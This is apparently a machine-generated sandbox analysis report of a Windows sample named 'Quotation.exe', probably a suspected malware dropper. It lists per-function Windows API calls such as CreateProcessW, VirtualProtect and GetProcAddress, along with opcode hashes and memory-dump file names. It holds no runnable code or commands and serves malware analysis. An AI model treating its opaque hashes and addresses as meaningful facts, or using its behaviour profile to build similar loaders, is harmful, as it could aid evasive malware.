                                                                                            • Opcode ID: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
                                                                                            • Instruction ID: a0caebe489df7e9b8c47fc78556c087e467958ed1b806a88a2837ae242d5d264
                                                                                            • Opcode Fuzzy Hash: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
                                                                                            • Instruction Fuzzy Hash: FAF0C2614042212AC72037751E88A2B255C8E4635971B4F3FFCA7F12D2CA7ECC31957D
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A3A40,?), ref: 004066DD
                                                                                            • CloseHandle.KERNEL32(?), ref: 004066EA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3712363035-0
                                                                                            • Opcode ID: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
                                                                                            • Instruction ID: 38b84478e037bba77e5bda8d52abba300c1c8c141792dec0b9fd1b8b871a7deb
                                                                                            • Opcode Fuzzy Hash: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
                                                                                            • Instruction Fuzzy Hash: 45E0BFF0600219BFFB009F64ED05E7BB66CFB44604F008529BD51E6150D77499149A79
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            • Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                                                                            • Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
                                                                                            • Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                                                                            • Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 6ad4e709d86c028406b87354e1aed307fb3f349c966afe3e4420958b6cf994ae
                                                                                            • Instruction ID: d93e78494e09aa6ec4d7f3fdec31074403eedaf14b92a7a433c4b641b89fd750
                                                                                            • Opcode Fuzzy Hash: 6ad4e709d86c028406b87354e1aed307fb3f349c966afe3e4420958b6cf994ae
                                                                                            • Instruction Fuzzy Hash: C741A0769007059FDF009F68DA81BA93BB4EF07338F24422AE535CF3A0D735A4A18B94
                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00793200,00403326,?,00793200,?,00793200,?,?), ref: 00406A00
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                                                                            • Instruction ID: af586fd2f7f6880044e5fe5766d6096d47c0719768b2310f5fb2dcc6f4abfd7b
                                                                                            • Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                                                                            • Instruction Fuzzy Hash: 68E0BF32600119BB8F205B56DD04D9FBF6DEE927A07124026F906B6150D670EA51DAE4
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00000000,004031A2,?,00000004,00000000,00000000,00000000,00000000), ref: 0040693D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                                            • Instruction ID: de6cc0abbc936f950c0aa48064430f9d9b1dfb465831d1c2e6fd43c94deb3c7e
                                                                                            • Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                                            • Instruction Fuzzy Hash: B7E0BF72200119BB8F215F46DD04D9FBF6DEE956A07114026B905A6150D670EA11D6E4
                                                                                            APIs
                                                                                            • VirtualProtect.KERNELBASE(6FF8501C,00000004,00000040,6FF85034), ref: 6FF81A68
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: 1bff8127119a0500e72edd0d0b85e0f4942515b0927be205f78e404a0c2cb49c
                                                                                            • Instruction ID: f0236cd0b057474380caad8b95ea0e69724d72aa2d1926dc757d1853453af039
                                                                                            • Opcode Fuzzy Hash: 1bff8127119a0500e72edd0d0b85e0f4942515b0927be205f78e404a0c2cb49c
                                                                                            • Instruction Fuzzy Hash: 20F092B4979B42DBCF198F2C94447293FB0B71B374B08452EF27A9A360C3304121AB9E
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406983,?,?,?,?,Call,00000000,00000000), ref: 004062DA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                                            • Instruction ID: 8275c49ac47c74d38988e0f8258bf7c149b7cc7998a497f72a9ef83b4f38b8ad
                                                                                            • Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                                            • Instruction Fuzzy Hash: 51D0123204020DBBDF11AF90DD01FAB372DAB08750F01443AFE16A40A0D775D531A718
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
                                                                                            • Instruction ID: ded955796c7b3a29419b03b8f07dbed72bf973f4b2991851ad7e5473cbc7331c
                                                                                            • Opcode Fuzzy Hash: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
                                                                                            • Instruction Fuzzy Hash: C3C04C716446007ADA109B619E05F077759A791701F10C8297240E55E0C675E460CA2C
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000028,?,00000001,00405316), ref: 004054EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
                                                                                            • Instruction ID: 87925707e6409367d6b01bd6df3e013852da7cf14c64ffa79ed0cacb9bd9d926
                                                                                            • Opcode Fuzzy Hash: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
                                                                                            • Instruction Fuzzy Hash: 28B09239684600AADA195B00EE09F467B62ABA4701F008428B240640B0CAB210A0DB18
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            • Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                                            • Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
                                                                                            • Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
                                                                                            • Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D
                                                                                            APIs
                                                                                              • Part of subcall function 6FF812F8: GlobalAlloc.KERNEL32(00000040,?,6FF811C4,-000000A0), ref: 6FF81302
                                                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FF8294E
                                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 6FF829A4
                                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 6FF829AF
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6FF829C0
                                                                                            • GlobalFree.KERNEL32(?), ref: 6FF82A44
                                                                                            • GlobalFree.KERNEL32(?), ref: 6FF82A4A
                                                                                            • GlobalFree.KERNEL32(?), ref: 6FF82A50
                                                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 6FF82B1A
                                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 6FF82B2B
                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 6FF82B82
                                                                                            • lstrlenW.KERNEL32(00000808), ref: 6FF82B9D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 1042148487-0
                                                                                            • Opcode ID: 7ccf4f0c45c710cc9a2c16f0280818f85c59d15592c0a3b7650cbe1dbdedb346
                                                                                            • Instruction ID: 14d75f44c2bf112e64bfb1557c7cfcdfab37adebc0f739b83f76f6013975dfe7
                                                                                            • Opcode Fuzzy Hash: 7ccf4f0c45c710cc9a2c16f0280818f85c59d15592c0a3b7650cbe1dbdedb346
                                                                                            • Instruction Fuzzy Hash: FC429072A487029FD718CF3889547AAB7F0FF89714F004A2EE5B9D6290E771F5448B92
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00000000,?,0040623C,?,?), ref: 0040631F
                                                                                            • GetShortPathNameW.KERNEL32(?,007A5688,00000400), ref: 00406328
                                                                                            • GetShortPathNameW.KERNEL32(?,007A4E88,00000400), ref: 00406345
                                                                                            • wsprintfA.USER32 ref: 00406363
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,007A4E88,C0000000,00000004,007A4E88,?), ref: 0040639B
                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063AB
                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063DB
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A4A88,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063FB
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040640D
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00406414
                                                                                              • Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
                                                                                              • Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                            • API String ID: 2900126502-461813615
                                                                                            • Opcode ID: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
                                                                                            • Instruction ID: 9f7f24d6a9d8affb6c81019e1e78af230b3462d5c5472edf7d8bbe76e1c752c2
                                                                                            • Opcode Fuzzy Hash: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
                                                                                            • Instruction Fuzzy Hash: 1B3128B16012117BD7206B358D49F7B3A5CEF81749B06453EF943FA2C2DA7D88628A7C
                                                                                            APIs
                                                                                              • Part of subcall function 6FF812F8: GlobalAlloc.KERNEL32(00000040,?,6FF811C4,-000000A0), ref: 6FF81302
